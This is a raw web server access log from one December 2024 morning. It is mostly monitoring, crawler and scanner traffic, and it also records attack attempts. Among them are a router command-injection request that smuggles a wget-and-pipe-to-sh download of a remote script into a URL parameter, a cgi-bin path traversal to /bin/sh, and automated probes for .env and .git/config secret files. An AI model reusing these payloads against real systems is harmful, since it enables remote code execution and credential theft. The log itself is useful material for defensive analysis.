141.98.11.35 - - [02/Dec/2024:10:55:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:56:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:10:57:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:10:57:41 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
77.105.166.134 - - [02/Dec/2024:10:58:02 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [02/Dec/2024:10:58:02 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 OpenWave/97.4.2043.44"
77.105.166.134 - - [02/Dec/2024:10:58:04 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:04 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:06 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:06 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:10:58:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:10:58:29 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:29 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5042.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:31 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:31 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:33 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:10:58:33 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
194.50.16.198 - - [02/Dec/2024:10:58:49 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
212.91.246.72 - - [02/Dec/2024:10:59:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.235.181.15 - - [02/Dec/2024:10:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:00:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:11:01:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:11:01:17 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
212.91.246.72 - - [02/Dec/2024:11:02:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Dec/2024:11:03:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [02/Dec/2024:11:03:28 +0100] "GET /web24/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [02/Dec/2024:11:04:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:11:04:21 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:21 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:23 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:23 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:26 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:26 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:46 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:46 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:48 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:48 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:50 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:04:50 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:05:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.80.34.130 - - [02/Dec/2024:11:05:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:06:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Dec/2024:11:06:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
93.174.93.12 - - [02/Dec/2024:11:07:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:07:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Dec/2024:11:07:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
167.94.146.63 - - [02/Dec/2024:11:07:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.63 - - [02/Dec/2024:11:07:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [02/Dec/2024:11:07:55 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.63 - - [02/Dec/2024:11:07:55 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
93.174.93.12 - - [02/Dec/2024:11:08:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
93.174.93.12 - - [02/Dec/2024:11:08:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:08:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [02/Dec/2024:11:08:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:09:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.89 - - [02/Dec/2024:11:09:25 +0100] "GET /chat.f-m-shop.de/web/ HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.174.93.12 - - [02/Dec/2024:11:09:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
66.249.66.88 - - [02/Dec/2024:11:09:42 +0100] "GET /web4/log/2014/02/ HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.87 - - [02/Dec/2024:11:09:45 +0100] "GET /maxima.f-m-computer.de/ HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [02/Dec/2024:11:10:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.23.38.229 - - [02/Dec/2024:11:10:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.23.38.229 - - [02/Dec/2024:11:10:21 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
34.83.238.227 - - [02/Dec/2024:11:10:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.83.238.227 - - [02/Dec/2024:11:10:25 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
77.105.166.134 - - [02/Dec/2024:11:10:37 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:10:37 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:10:39 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:10:39 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:10:41 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:10:41 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
93.174.93.12 - - [02/Dec/2024:11:10:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
93.174.93.12 - - [02/Dec/2024:11:10:53 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:11:01 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:11:11:01 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Herring/95.1.8810.11"
77.105.166.134 - - [02/Dec/2024:11:11:03 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:11:03 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:11:06 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:11:06 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:11:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
47.237.6.119 - - [02/Dec/2024:11:11:48 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
35.231.146.194 - - [02/Dec/2024:11:12:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.231.146.194 - - [02/Dec/2024:11:12:04 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Dec/2024:11:12:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.50.16.198 - - [02/Dec/2024:11:12:38 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 323 "-" "-"
93.174.93.12 - - [02/Dec/2024:11:12:54 +0100] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [02/Dec/2024:11:13:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.1.88 - - [02/Dec/2024:11:13:16 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [02/Dec/2024:11:14:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.88 - - [02/Dec/2024:11:14:32 +0100] "GET /ftp.modeinstitut-berlin.de/user/web49_mode_ftp01/ HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.91.246.72 - - [02/Dec/2024:11:15:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.159.97.9 - - [02/Dec/2024:11:15:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.159.97.9 - - [02/Dec/2024:11:15:52 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Dec/2024:11:16:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.66.87 - - [02/Dec/2024:11:16:38 +0100] "GET /apache2-default/ HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.105.166.134 - - [02/Dec/2024:11:16:51 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:16:51 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:16:53 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:16:53 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:16:56 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:16:56 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36"
212.91.246.72 - - [02/Dec/2024:11:17:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.105.166.134 - - [02/Dec/2024:11:17:18 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:17:18 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:17:20 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:17:20 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:17:22 +0100] "GET /webalizer/ HTTP/1.0" 404 315 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
77.105.166.134 - - [02/Dec/2024:11:17:22 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36"
34.159.93.60 - - [02/Dec/2024:11:17:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.159.93.60 - - [02/Dec/2024:11:17:39 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Dec/2024:11:18:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.235.121.184 - - [02/Dec/2024:11:18:56 +0100] "\x16\x03\x01" 501 318 "-" "-"
35.235.121.184 - - [02/Dec/2024:11:18:58 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
212.91.246.72 - - [02/Dec/2024:11:19:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.78.31.168 - - [02/Dec/2024:11:19:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.83.238.227 - - [02/Dec/2024:11:19:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
34.78.31.168 - - [02/Dec/2024:11:19:38 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
34.83.238.227 - - [02/Dec/2024:11:19:38 +0100] "OPTIONS / HTTP/1.0" 200 - "-" "-"
31.220.1.88 - - [02/Dec/2024:11:19:50 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
179.43.163.250 - - [02/Dec/2024:11:19:55 +0100] "\x16\x03\x01" 501 318 "-" "-"
179.43.163.250 - - [02/Dec/2024:11:19:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [02/Dec/2024:11:19:55 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET /.env.uat HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET /static../.git/config HTTP/1.1" 404 325 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET /.env.docker-compose HTTP/1.1" 404 324 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET /backup/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:56 +0100] "GET /.env.secret HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:57 +0100] "GET /.env.testing.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:57 +0100] "GET /.env.ci HTTP/1.1" 404 312 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:57 +0100] "GET /.env.prod.local HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:57 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:58 +0100] "GET /core/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:58 +0100] "GET /configuration/.env HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:58 +0100] "GET /.env.tmp HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /cms/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /www/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /.env.default HTTP/1.1" 404 317 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /.env.development.local HTTP/1.1" 404 327 "-" "l9explore/1.2.2"
179.43.163.250 - - [02/Dec/2024:11:19:59 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
